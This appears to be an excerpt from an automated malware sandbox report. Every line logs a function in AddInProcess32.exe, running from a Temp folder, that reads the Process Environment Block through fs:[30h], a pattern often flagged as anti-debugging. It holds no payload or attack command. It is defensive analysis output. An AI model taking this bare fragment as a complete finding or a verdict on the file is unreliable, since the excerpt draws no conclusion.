Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h] 10_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h] 10_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133DB60 mov ecx, dword ptr fs:[00000030h] 10_2_0133DB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133F358 mov eax, dword ptr fs:[00000030h] 10_2_0133F358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133DB40 mov eax, dword ptr fs:[00000030h] 10_2_0133DB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362397 mov eax, dword ptr fs:[00000030h] 10_2_01362397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136B390 mov eax, dword ptr fs:[00000030h] 10_2_0136B390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F138A mov eax, dword ptr fs:[00000030h] 10_2_013F138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h] 10_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h] 10_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013ED380 mov ecx, dword ptr fs:[00000030h] 10_2_013ED380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135DBE9 mov eax, dword ptr fs:[00000030h] 10_2_0135DBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov eax, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01405BA5 mov eax, dword ptr fs:[00000030h] 10_2_01405BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h] 10_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h] 10_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h] 10_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h] 10_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408A62 mov eax, dword ptr fs:[00000030h] 10_2_01408A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov ecx, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h] 10_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h] 10_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01353A1C mov eax, dword ptr fs:[00000030h] 10_2_01353A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h] 10_2_013FAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h] 10_2_013FAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01348A0A mov eax, dword ptr fs:[00000030h] 10_2_01348A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137927A mov eax, dword ptr fs:[00000030h] 10_2_0137927A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h] 10_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h] 10_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FEA55 mov eax, dword ptr fs:[00000030h] 10_2_013FEA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013C4257 mov eax, dword ptr fs:[00000030h] 10_2_013C4257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136FAB0 mov eax, dword ptr fs:[00000030h] 10_2_0136FAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h] 10_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h] 10_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362AE4 mov eax, dword ptr fs:[00000030h] 10_2_01362AE4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362ACB mov eax, dword ptr fs:[00000030h] 10_2_01362ACB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] 10_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133AD30 mov eax, dword ptr fs:[00000030h] 10_2_0133AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FE539 mov eax, dword ptr fs:[00000030h] 10_2_013FE539
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013BA537 mov eax, dword ptr fs:[00000030h] 10_2_013BA537
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h] 10_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h] 10_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h] 10_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135C577 mov eax, dword ptr fs:[00000030h] 10_2_0135C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135C577 mov eax, dword ptr fs:[00000030h] 10_2_0135C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01357D50 mov eax, dword ptr fs:[00000030h] 10_2_01357D50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408D34 mov eax, dword ptr fs:[00000030h] 10_2_01408D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01373D43 mov eax, dword ptr fs:[00000030h] 10_2_01373D43
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B3540 mov eax, dword ptr fs:[00000030h] 10_2_013B3540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E3D40 mov eax, dword ptr fs:[00000030h] 10_2_013E3D40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h] 10_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h] 10_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h] 10_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013635A1 mov eax, dword ptr fs:[00000030h] 10_2_013635A1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h] 10_2_0136FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h] 10_2_0136FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362581 mov eax, dword ptr fs:[00000030h] 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362581 mov eax, dword ptr fs:[00000030h] 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362581 mov eax, dword ptr fs:[00000030h] 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362581 mov eax, dword ptr fs:[00000030h] 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h] 10_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h] 10_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h] 10_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h] 10_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h] 10_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h] 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E8DF1 mov eax, dword ptr fs:[00000030h] 10_2_013E8DF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h] 10_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h] 10_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014005AC mov eax, dword ptr fs:[00000030h] 10_2_014005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014005AC mov eax, dword ptr fs:[00000030h] 10_2_014005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov ecx, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136BC2C mov eax, dword ptr fs:[00000030h] 10_2_0136BC2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h] 10_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h] 10_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h] 10_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h] 10_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h] 10_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140740D mov eax, dword ptr fs:[00000030h] 10_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140740D mov eax, dword ptr fs:[00000030h] 10_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140740D mov eax, dword ptr fs:[00000030h] 10_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h] 10_2_0136AC7B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135746D mov eax, dword ptr fs:[00000030h] 10_2_0135746D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CC450 mov eax, dword ptr fs:[00000030h] 10_2_013CC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136A44B mov eax, dword ptr fs:[00000030h] 10_2_0136A44B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408CD6 mov eax, dword ptr fs:[00000030h] 10_2_01408CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h] 10_2_013F4496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134849B mov eax, dword ptr fs:[00000030h] 10_2_0134849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F14FB mov eax, dword ptr fs:[00000030h] 10_2_013F14FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_013B6CF0
